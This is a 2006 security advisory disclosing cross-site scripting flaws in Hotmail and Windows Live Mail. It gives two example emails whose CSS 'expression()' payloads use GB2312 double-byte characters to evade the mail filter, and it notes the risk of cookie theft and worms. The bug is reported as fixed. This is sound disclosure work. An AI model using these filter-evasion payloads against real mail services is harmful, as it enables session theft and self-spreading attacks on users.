Hotmail and Windows Live Mail XSS Vulnerabilities
Adivisory Name : Hotmail and Windows Live Mail XSS Vulnerabilities
Release Date : 2006.11.03
Test On : Microsoft IE 6.0
Discover : Cheng Peng Su(applesoup_at_gmail.com)
Introduction:
Hotmail and Windows Live Mail are both web-based e-mail services by Microsoft.
Details:
Hotmail's filter identifies "expression()" syntax in a CSS attribute. According
to Hasegawa Yosuke's
post(http://archive.openmya.devnull.jp/2006.08/msg00369.html), in some
character encodings(e.g. GB2312), we can substitute some special double-byte
chars for the corresponding chars in "expression()". In this case, we can
create a malformed CSS attribute, which Hotmail's filter fails to inspect and
filter the "expression()" syntax.
An example:
Hotmail
--------------------------------------------------
MIME-Version: 1.0
From: user<user@xxxxxxxx>
Content-Type: text/html; charset=GB2312
Subject: example
<img id='sss'>
<input id='ttt' value="javascript:alert('xss')">
<span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii
168]document.all.sss.src=document.all.ttt.value)">exploited</span>
.
--------------------------------------------------
Windows Live Mail
--------------------------------------------------
MIME-Version: 1.0
From: user<user@xxxxxxxx>
Content-Type: text/html; charset=GB2312
Subject: example
<img id='sss'>
<input id='ttt' value="javascript:alert('xss')">
<span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii
168]document.all.EC_sss.src=document.all.EC_ttt.value)">exploited</span>
.
--------------------------------------------------
the injected code inside the CSS attribute is responsible for
-Getting cookies.
-Potential web-based e-mail worm.
Vender status:
Microsoft was notified on Sep 25th, 2006.
The bug is now fixed.
Original advisory:
http://applesoup.googlepages.com/hotmail_xss.txt